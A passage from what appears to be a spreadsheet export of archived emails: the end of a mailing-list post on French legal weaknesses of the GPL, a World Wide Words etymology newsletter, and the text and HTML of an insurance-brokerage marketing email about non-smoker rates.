 reference to "copyright" is not legally 
 sufficient in the framework of international 
 contracts  (which is the case of licence 
 contracts for programmes developed and spread 
 via the Internet). The idea of copyright can 
 basically include differences from one country 
 to another. This is why, under international 
 contracts, it is necessary to specify to which 
 laws one is referring (French law, American &amp;c.).
 The authors only found three public licences 
 which were correctly formulated on this point: 
 QPL, IBM Public Licence and the Mozilla Public
 Licence).
 Specification in the English language.
 Next, the authors remind us that (at least in 
 France), no clause in a contract may be contrary 
 to French law [2]. However, it turns out that a 
 licence such as the GPL is contrary to French law 
 in several respects. Firstly, it is written in 
 English and the FSF doesn't officially approve 
 translations. 
 The "Toubon law" obliges this sort 
 of contract to be written in French, including for 
 businesses since the notion of "user" applies not 
 only to consumers, but also to businesses, 
 professionals &amp;c. 
 Contacted by the editors of LinuxFrench, 
 lawyer Cyril Rojinsky declared that, as 
 far as business is concerned, the "Toubon 
 law" is probably doomed to change since 
 it is in contradiction of European directives 
 on the subject, but whatever about that, the 
 problem is still valid for individuals, and 
 while waiting for it (French law) to change, 
 French companies have to deal with it, since 
 it is the law of the land.
 A programme under the GPL can suddenly 
 change licence.
 Another problem, much more serious, is 
 that according to French law, the author of 
 a free programme can, at any time, invoke 
 the invalidity of the licence for this 
 software by simply changing the licence.
 In effect, the law of intellectual 
 property stipulates that the granting of  
 rights by the author is subordinate to 
 the condition that each of these granted 
 rights be the object of a distinct clause 
 in the granting act (i.e. the licence) and 
 that the granting of any such rights be 
 delimited with respect to its scope and its 
 grantees, and also with respect to its 
 location (i.e. where such rights may be 
 excersised)  and duration of any such grants. 
 [3] This is not the case of the GPL nor of
 other free licences. Briefly, this means 
 that in France, or elsewhere if the author 
 is French, that which is under the GPL could 
 revert to proprietary from one day to the next. 
 The problem of the guarantee "hidden defects".
 An other very serious flaw is that of the 
 guarantee. The GPL licences and others show 
 that the software is delivered "without 
 guarantee". You are going to immediately
 reply that commercical programmes carry the 
 same clause in their licence contracts,
 and this is correct. However, whatever is 
 written in a licence contract, one cannot
 free oneself from the "guarantee from 
 hidden defects", since it is imposed in the 
 Civil Code. This concept is poorly understood 
 by the layman, it protects the buyer
 (whoever it may be, individual or business, 
 since it specifies the Civil Code and not 
 consumer protection law) against hidden 
 defects, deliberate or made in good faith by 
 the seller. 
 For example, if one buys a pair of socks 
 in a sale, and the shop has a notice 
 specifying that "Sale items are neither 
 refunded nor exchanged", and on arriving 
 home you notice that one of the socks has 
 a hole in it, several scenarios are possible.
 You could have checked the socks before 
 purchase: the flaw is deemed "obvious" and
 you can sing for your money.
 You couldn't check the socks (they were 
 packaged for example), and in this case, 
 despite the notice "neither refund nor 
 exchange", you may invoke "hidden defect" 
 and have them changed or obtain a refund, 
 it's up to you. 
 Personally, I have already invoked in shops 
 the "hidden defect" clause and it always 
 worked well (shopkeepers are always very 
 cooperative if you quote a couple of words 
 of the Civil Code). 
 The concept of hidden defect is rather 
 wide, it is necessary that you hadn't 
 the possibility of discovering the defect 
 before buying the product and then 
 (according to the Civil Code) that you 
 wouldn't have bought it at that price if 
 you had known about the
 defect.
 The third case which is much rarer , is 
 if you are able to show that the vendor had
 knowledge of the defect (hidden), but didn't 
 inform you. In this case, not only does he 
 have to reimburse the product, but all 
 expenses incurred by the sale (metro 
 tickets to go to the shop, the fuse 
 which blew when you plugged it in &amp;c.)
 This idea of "hidden defect" applies to
  all products, including programmes. This 
 was made abundantly clear by the 
 authorities (and the courts) surrounding 
 Y2K. 
 This is particularly inconvenient for 
 free programmes, since a site which 
 offers a Linux distro for download is 
 supposed to provide a guarantee against 
 hidden flaws.
 LinuxFrench asked Cyril ROJINSKY if 
 in the case of a free programme, 
 one could speak about a "hidden" defect 
 since the source code was available, 
 he replied "Actually, concerning the 
 guarantee, the question of obvious 
 defect will arise. This analyis will 
 be different depending on whether the 
 person who downloads the distribution 
 is an IT professional or not". 
 OpenSource has this advantage over 
 the proprietary programme: it protects 
 the distributor against a guarantee of
 hidden defect insofar as the buy is an 
 IT person. But, for distribution to the 
 public at large, the problem remains 
 the same.
 Roughly Speaking.
 Lawyer Cyril ROJINSKY said it himself, 
 this study is far from being exhaustive 
 and many other areas could be explored. 
 During this interview, we asked ourselves, 
 for example, about the fragility of the 
 GPL clause which forbids linking source 
 code under the GPL with proprietary code. 
 In effect, the laws of intellectual 
 property give the right to the user 
 to modify a programme with the
 intention of permitting interoperability 
 with another programme. If for that,
 I need to link with a proprietary library 
 (communication protocol, device driver)
 I may consider as "null and void" this 
 clause of the GPL.
 The conclusion of this study is a wake 
 up call for the community. "Freedom" 
 merits more than these shoddy licences, 
 which should be modified before court 
 cases over them proliferate and put at 
 risk the undeniable originality of 
 this effort.
 ---------------------------
 [1] Une publication de l'Institut 
 de recherche en proprit 
 intellectuelle, No4 Juillet 2002
 [2] Une telle clause de contrat 
 qui est oppose  ce que dit la Loi 
 franaise est qualifie en terme 
 juridique de  clause rpute 
 non-crite , c'est--dire 
 qu'on fait comme si cette clause 
 n'tait pas crite dans le contrat. 
 C'est pour cela par exemple que vous 
 pouvez signer un bail pour un 
 appartement qui stipule que 
 les enfants sont interdits dans 
 l'immeuble, et envisager sans 
 inquitude d'avoir quand mme 
 un enfant, en effet le code civil 
 stipule que le devoir d'un locataire 
 d'un appartement doit se comporter 
 en  bon pre de famille  
 [3] Article L131-3
 ___________________________________________________________
 Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !
 Yahoo! Mail : http://fr.mail.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject:      World Wide Words -- 17 Aug 02
</t>
  </si>
  <si>
    <t xml:space="preserve">WORLD WIDE WORDS         ISSUE 303          Saturday 17 August 2002
 -------------------------------------------------------------------
 Sent each Saturday to 15,000+ subscribers in at least 119 countries
 Editor: Michael Quinion, Thornbury, Bristol, UK      ISSN 1470-1448
 &lt;http://www.worldwidewords.org&gt;      &lt;TheEditor@worldwidewords.org&gt;
 -------------------------------------------------------------------
  IF YOU RESPOND TO THIS MAILING, REMEMBER TO CHANGE THE OUTGOING
    ADDRESS TO ONE OF THOSE IN THE 'CONTACT ADDRESSES' SECTION.
 Contents
 -------------------------------------------------------------------
 1. Feedback, notes and comments.
 2. Turns of Phrase: Asian Brown Cloud.
 3. Weird Words: Pyknic.
 4. Q&amp;A: Mash note.
 5. Endnote.
 A. Subscription commands.
 B. Contact addresses.
 1. Feedback, notes and comments
 -------------------------------------------------------------------
 MACHINIMA  My reputation for small errors continues to grow (I am
 keeping quiet about the big ones) with a misprint in last week's
 piece on this word. In the sentence giving the etymology, of all
 places, I misspelled it "mechanima", thus confusing everybody.
 APPETITE OVER TIN CUP  Several replies came in about this saying,
 confirming that variations on it and other ways of saying "head
 over heels" are widely known, especially "ass over appetite" from
 the US, where "appetite" may be a transferred term for the mouth.
 But the specific form that Maria Jessup Robinson was asking about,
 "appetite over tin cup", seems not to be known much at all. It
 would seem to be a conflation of the British expression "arse over
 teakettle" and the American "ass over appetite" (note my deliberate
 use of the two spellings of "arse" here!). The saying was probably
 modified because at the time it was created a tea kettle was an
 item less common in America than in Britain. Even in Britain these
 days it is obsolete as a fixed term except within this expression,
 which itself is now not very common.
 BUMBERSHOOT  Several subscribers have pointed out that the word is
 in the lyric of a song sung by Dick Van Dyke in the film "Chitty
 Chitty Bang Bang":
   Me ol' bam-boo, me ol' bam-boo
   You'd better never bother with me ol' bam-boo
   You can have me hat or me bumbershoot
   But you'd better never bother with me ol' bam-boo
 It may be one reason why some Americans, not familiar with the word
 in their own country, have come to believe it must be British.
 OLOGIES AND ISMS  The publication date of my book has been moved
 back a week in the UK to 29 August. A review by Jonathon Green is
 scheduled for the issue of 31 August (assuming nobody changes the
 date again). See &lt;http://www.worldwidewords.org/ologies.htm&gt; for
 more details and UK ordering information.
 2. Turns of Phrase: Asian Brown Cloud
 -------------------------------------------------------------------
 As though we didn't have enough to worry about weather-wise, what
 with global warming, the ozone hole, and the new El Nio season,
 UN scientists have now identified this new threat to the world's
 climate. It is a cloud of smog three kilometres deep, enveloping
 the whole of southern Asia - a soup of industrial pollutants,
 carbon monoxide from vehicle exhausts and particles of soot from
 burning forests and millions of rural cooking fires. It blocks 15%
 of sunlight, which reduces crop yields. It also creates acid rain,
 leads to respiratory illnesses, reduces rainfall and causes extreme
 weather events. Because the cloud is capable of being dispersed
 rapidly around the world, it may affect a much wider area than just
 Asia. The term "Asian Brown Cloud" seems to have been around for a
 couple of years in scientific circles, but came to prominence this
 week in a report prepared by a team of international climatologists
 at the UN Environment Programme in preparation for the World Summit
 on Sustainable Development in Johannesburg next week. The good
 news, they say, is that unlike other causes of pollution and
 climate change, this one is curable if Asians can shift to more
 efficient ways of burning fuels.
 The "Asian Brown Cloud," a 2-mile-thick blanket of pollution over
 South Asia, may be causing the premature deaths of half a million
 people in India each year, deadly flooding in some areas and
 drought in others, a new U.N.-sponsored study indicates.
                                    ["Los Angeles Times", Aug. 2002]
 A UN-backed study released on Friday said the "Asian Brown Cloud" -
 a vast haze of pollution stretching across South Asia - is damaging
 agriculture, modifying rainfall patterns and endangering the
 population.
                                 ["Agence France Presse", Aug. 2002]
 3. Weird Words: Pyknic  /'pIknIk/
 -------------------------------------------------------------------
 Short and fat.
 Nothing to do with al-fresco meals, though it is said the same way
 as "picnic".
 In the early years of the twentieth century the German psychiatrist
 Ernst Kretschmer examined criminals to try to tie their physical
 shape and constitution to their personalities and mental illnesses.
 Tall and thin ones he called "asthenic" (or "leptosomic") and
 considered them to be the sort that commits fraud and petty theft.
 A second set were athletic types with well-developed muscles, whom
 he concluded, unsurprisingly, were more likely to be violent. The
 third sort were the "pyknic" ones, who seemed to be a mixture of
 the other two kinds so far as their criminal tendencies were
 concerned. He took "pyknic" from Greek "puknos", thick or close-
 packed; it appeared first in his book "Krperbau und Charakter"
 (Physique and Character) in 1921, from where it soon moved into
 English.
 The American psychologist William Sheldon built on and modified
 Kretschmer's ideas, coming up with the three terms to describe body
 types - "endomorph", "mesomorph" and "ectomorph" - that are now
 more common. He considered Kretschmer's pyknic type to be a mixture
 of the endomorph (with a soft round body tending to put on fat, the
 Santa Claus type) and the mesomorph (with a compact, powerful, and
 athletic body tending to the Tarzan or Mr Universe type) and came
 up with the phrase "pyknic practical joke" to describe a person who
 is muscular in early life but who later goes pear-shaped and
 balloons out into obesity.
 4. Q&amp;A
 -------------------------------------------------------------------
 Q. A friend and I were reading a recent article in the "New York
 Times" that made mention of a "mash note". I had never heard this
 term before, but I extrapolated that it is some sort of love note.
 Is there a more specific meaning than a simple love note? And can
 you give some insight as to the origin of the term? [Jane
 Rosenthal, California]
 A. You're right about the meaning of the phrase.
 We have to go back some way to find the origin. The first form was
 the word "mash" by itself. This was a slang term in the US in the
 1870s for an infatuation or crush (a magazine in 1877 defined it as
 "a deep but fleeting affection of the heart"). A "mash" could also
 be a dandy or the object of one's affection (of either sex) or - as
 a verb - to make amorous advances to a member of the opposite sex,
 to flirt or seduce. A "masher" was a man who thought himself
 irresistible to the female sex but whose advances were often
 unwelcome.
 The evidence collected by Professor Lighter in the "Random House
 Historical Dictionary of American Slang" and by others suggests
 that it was originally a term used in and around the theatre.
 Charles Godfrey Leland (best known for his "Hans Breitmanns
 Ballads" about a German immigrant) wrote a note above his poem,
 "The Masher", dated about 1895, confirming this:
   The word to "mash," in the sense of causing love or
   attracting by a glance or fascinating look, came into
   ordinary slang from the American stage. Thus an actress
   was often fined for "mashing" or smiling at men in the
   audience.
 "Mash" and its derivatives crossed the Atlantic to Britain about
 1880. "Masher" in particular became a term in London society,
 especially among the more raffish supper-club and theatre-going
 classes, for a type of fashionable male. The Oxford English
 Dictionary defines it (with a distinctly maidenly air of drawing
 away its collective skirts) as "a fop of affected manners and
 exaggerated style of dress who frequented music-halls and
 fashionable promenades and who posed as a 'lady-killer'", noting
 that the word had been common "in 1882 and for a few years after".
 In a letter from London in the old "Overland Monthly and Out West
 Magazine" in 1889, a correspondent described a member of an
 impoverished theatrical company: "This dashing youth was distinctly
 conscious of his fascinations for the buxom maids who sighed beside
 us, and the airy and elegant nonchalance of the glances that
 superbly took them in would be a lesson for champion 'mashers' of a
 far higher class".
 A "mash note" (in its first appearances, "mash letter") was an
 obvious enough extension: a love letter. It is recorded first in
 1880 and - as you have discovered - is still doing well.
 Where "mash" and its relatives come from has been a subject of
 debate. It is sometimes said that it is from the standard English
 word meaning to make soft by one of various means, with its obvious
 reference to rendering the object of one's attentions pliable and
 yielding. Max Beerbohm, writing in London in 1894 (mashers were
 still around then, despite the OED's comment) remarked that some
 people derived it from "Ma Chre", "the mode of address used by the
 gilded youth to the barmaids of the period". But he thought it
 really came from "the chorus of a song, which, at that time, had a
 great vogue in the music-halls: 'I'm the slashing, dashing, mashing
 Montmorency of the day.'" We're pretty sure now that he was wrong,
 but he could hardly know that.
 Back to Charles Leland again. Apart from his humorous writings, he
 also researched and wrote a great deal about the Romany language as
 well as Gypsy songs and customs. The following note from the
 introduction to the poem gives an origin that is now widely
 accepted:
   It was introduced by the well-known gypsy family of actors,
   C., among whom Romany was habitually spoken. The word
   "masher" or "mash" means in that tongue to allure, delude,
   or entice. It was doubtless much aided in its popularity by
   its quasi-identity with the English word. But there can be
   no doubt as to the gypsy origin of "mash" as used on the
   stage. I am indebted for this information to the late well-
   known impresario Palmer of New York, and I made a note of
   it years before the term had become at all popular.
 Though defunct in British English, "mash" and "masher" have never
 quite gone away in America. "Mash" had a resurgence of popularity
 as student slang in the 1980s in the sense of necking or petting,
 though that may be a back-formation from "mash note".
 5. Endnote
 -------------------------------------------------------------------
 "A Spanish lady asked an acquaintance during a visit to Ireland
 whether there was a word in his language similar to 'manaa'. The
 Irishman thought for a moment, then said: 'Sure there is, but it
 doesn't have the same sense of urgency.'" [Traditional Irish joke.]
 A. Subscription commands
 -------------------------------------------------------------------
 To leave the list, change your subscription address, or subscribe,
 please visit &lt;http://www.worldwidewords.org/wordlist.htm&gt;.
 Or, you can send a message to &lt;listserv@listserv.linguistlist.org&gt;
 from the address at which you are (or want to be) subscribed:
   To leave, send: SIGNOFF WORLDWIDEWORDS
   To join, send: SUBSCRIBE WORLDWIDEWORDS First-name Last-name
 B. Contact addresses
 -------------------------------------------------------------------
 Do not use the address that comes up when you hit 'Reply' on this
 mailing, or your message will be sent to an electronic dead-letter
 office. Either create a new message, or change the outgoing 'To:'
 address to one of these:
   For general comments, especially responses to Q&amp;A pieces:
       &lt;TheEditor@worldwidewords.org&gt;.
   For questions intended for reply in a future Q&amp;A feature:
       &lt;QandA@worldwidewords.org&gt;.
 -------------------------------------------------------------------
 World Wide Words is copyright (c) Michael Quinion 2002.  All rights
 reserved. The Words Web site is at &lt;http://www.worldwidewords.org&gt;.
 -------------------------------------------------------------------
 You may reproduce this newsletter in whole or in part in other free
 media online provided that you include this note and the copyright
 notice above. Reproduction in print media or on Web sites requires
 prior permission: contact &lt;TheEditor@worldwidewords.org&gt;.
 -------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Preferred Non-Smoker Rates for Smokers
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1BDD6B_01C29AE9.2CD26A80
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  	 Preferred Non-Smoker
  Just what the doctor ordered!	
 Case Study #1	 
 Male - 63
 $5,000,000 face
 Good Health
 5-10 Cigarettes a day 	
 Issued: Preferred Non-Smoker	 
 Case Study #2	 
 Female - 57
 $785,000 face
 Good Health
 Social Cigarette Smoker	 
 Issued: Preferred Non-Smoker	 
 Case Study #3	 
 Male - 52
 $5,200,000 face
 Good Health
 1-2 Cigars a month	 
 Issued:Preferred Best Non-Smoker	 
 Case Study #4	 
 Male - 48
 $1,000,000 face
 Private Pilot
 Smokes Cigars Daily 	
 Issued: Preferred Non-Smoker
 without Aviation Flat Extra	 
 Click here to provide the details on your tobacco case!
 &lt;https://usflsite.usfli.com/forms/tn/question/f-smoke.html&gt; 
 Call the Doctor with your case details!
 We've cured 1,000s of agents' "tough cases!"
  800-624-4502
 - or - 	
 Please fill out the form below for more information	 
 Name:	  	 	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
   Tennessee Brokerage Agency
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout/
 &lt;http://www.insuranceiq.com/optout/&gt; 
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt; 
 ------=_NextPart_000_1BDD6B_01C29AE9.2CD26A80
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Preferred Non-Smoker Rates for Smokers&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#ffffff"&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;
 			&lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/Images/tba/0923/20020925-101a.jpg" width=3D"241" =
 height=3D"349"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/Images/tba/0923/20020925-102.gif" alt=3D"Preferred =
 Non-Smoker" width=3D"309" height=3D"132"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/Images/tba/0923/20020925-103a.gif" =
 width=3D"309" height=3D"217"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/Images/tba/0923/20020925-104.gif" alt=3D"Just what =
 the doctor ordered!" width=3D"550" height=3D"65"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td&gt;
 			&lt;table width=3D"100%" border=3D"0" cellpadding=3D"0" =
 cellspacing=3D"0" bgcolor=3D"#F3D8B4"&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td height=3D"100" colspan=3D"2"&gt;&lt;img =
 src=3D"http://iiq.us/Images/tba/0923/20020923-4.gif" width=3D"530" =
 height=3D"74"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td width=3D"50%" align=3D"center"&gt;
 						&lt;table width=3D"250" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"1" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;=20
                   &lt;table width=3D"100%" border=3D"0" cellpadding=3D"2" =
 cellspacing=3D"0" bgcolor=3D"#FFFFFF"&gt;
                     &lt;tr&gt;=20
                       &lt;td align=3D"center" bgcolor=3D"#000066"&gt;&lt;font =
 color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Case Study #1&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td bgcolor=3D"#CCCCCC"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Male - =
 63&lt;br&gt;
                         $5,000,000 face&lt;br&gt;
                         Good Health&lt;br&gt;
                         5-10 Cigarettes a day &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td align=3D"center"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Issued: =
 &lt;font color=3D"#FF0000"&gt;Preferred Non-Smoker&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td width=3D"50%" align=3D"center"&gt;=20
             &lt;table width=3D"250" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"1" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;=20
                   &lt;table width=3D"100%" border=3D"0" cellpadding=3D"2" =
 cellspacing=3D"0" bgcolor=3D"#FFFFFF"&gt;
                     &lt;tr&gt;=20
                       &lt;td align=3D"center" bgcolor=3D"#000066"&gt;&lt;font =
 color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Case Study #2&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td bgcolor=3D"#CCCCCC"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Female =
 - 57&lt;br&gt;
                         $785,000 face&lt;br&gt;
                         Good Health&lt;br&gt;
                         Social Cigarette Smoker&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td align=3D"center"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Issued: =
 &lt;font color=3D"#FF0000"&gt;Preferred Non-Smoker&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td height=3D"145" valign=3D"top"&gt;=20
             &lt;table width=3D"250" height=3D"0" border=3D"1" =
 cellpadding=3D"0" cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;=20
                   &lt;table width=3D"100%" border=3D"0" cellpadding=3D"2" =
 cellspacing=3D"0" bgcolor=3D"#FFFFFF"&gt;
                     &lt;tr&gt;=20
                       &lt;td align=3D"center" bgcolor=3D"#000066"&gt;&lt;font =
 color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Case Study #3&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td height=3D"80" bgcolor=3D"#CCCCCC"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Male - 52&lt;br&gt;
                         $5,200,000 face&lt;br&gt;
                         Good Health&lt;br&gt;
                         1-2 Cigars a month&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td align=3D"center"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Issued:&lt;font color=3D"#FF0000"&gt;Preferred Best =
 Non-Smoker&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td valign=3D"top"&gt;=20
             &lt;table width=3D"250" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"1" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;=20
                   &lt;table width=3D"100%" border=3D"0" cellpadding=3D"2" =
 cellspacing=3D"0" bgcolor=3D"#FFFFFF"&gt;
                     &lt;tr&gt;=20
                       &lt;td align=3D"center" bgcolor=3D"#000066"&gt;&lt;font =
 color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Case Study #4&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td bgcolor=3D"#CCCCCC"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Male - =
 48&lt;br&gt;
                         $1,000,000 face&lt;br&gt;
                         Private Pilot&lt;br&gt;
                         Smokes Cigars Daily &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Issued: =
 &lt;font color=3D"#FF0000"&gt;Preferred Non-Smoker&lt;/font&gt;&lt;br&gt;
                         &lt;font size=3D"1"&gt;without Aviation Flat =
 Extra&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;a =
 href=3D"https://usflsite.usfli.com/forms/tn/question/f-smoke.html"&gt;&lt;img =
 src=3D"http://iiq.us/Images/tba/0923/20020923-2a.gif" alt=3D"Click here =
 to provide the details on your tobacco case!" width=3D"484" =
 height=3D"106" border=3D"0"&gt;&lt;/a&gt;&lt;br&gt;
             &lt;b&gt;&lt;font color=3D"#0000FF" size=3D"4"&gt;Call the Doctor with =
 your case details!&lt;/font&gt;&lt;br&gt;
             &lt;font size=3D"4" color=3D"#FF0000"&gt;We've cured 1,000s of =
 agents' "tough cases!"&lt;/font&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/Images/tba/0923/20020923-3.gif" =
 alt=3D"800-624-4502" width=3D"540" height=3D"74"&gt;&lt;br&gt;
             &lt;font color=3D"#000000" size=3D"2"&gt;- or -&lt;/font&gt;&lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td colspan=3D"2"&gt;=20
             &lt;table width=3D"95%" border=3D"1" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#eeeeee"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#003366"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Please fill =
 out the form below for more information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q3.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20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&lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"impairedrisk@tba.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"TBA Smoker Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &amp;nbsp;&lt;img =
 src=3D"http://iiq.us/Images/tba/0923/20020925-2.gif" alt=3D"Tennessee =
 Brokerage Agency" width=3D"160" height=3D"144"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;
 			&lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;We don't =
 want anyone to receive our mailings who does not=20
 			wish to receive them. This is a professional communication=20
 			sent to insurance professionals. To be removed from this mailing=20
 			list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;=20
 			http://www.insuranceiq.com/optout/&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1" =
